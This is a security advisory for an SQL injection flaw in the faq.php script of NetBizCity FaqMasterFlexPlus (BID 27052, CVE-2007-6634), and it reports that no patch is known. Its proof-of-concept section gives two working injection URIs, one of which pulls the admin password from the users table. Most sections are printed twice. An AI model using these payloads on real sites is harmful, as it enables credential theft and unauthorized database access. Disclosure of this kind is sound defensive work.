NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
BID:27052
Info
NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
| Bugtraq ID: | 27052 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6634 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 28 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | Juan Galiana <jgaliana gmail com> discovered this vulnerability. |
| Vulnerable: |
NetBizCity FaqMasterFlexPlus 0 |
| Not Vulnerable: | |
Discussion
NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
FaqMasterFlexPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
All versions of FaqMasterFlexPlus are considered vulnerable.
FaqMasterFlexPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
All versions of FaqMasterFlexPlus are considered vulnerable.
Exploit / POC
NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,user(),1/*
http://www.example.com/[path/to/faq]/faq.php?category_id=1'%20union%20select%201,1,passwrd,1%20from%20users%20where%20userid='admin
Solution / Fix
NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability
References:
References:
- Home Page (NetBizCity )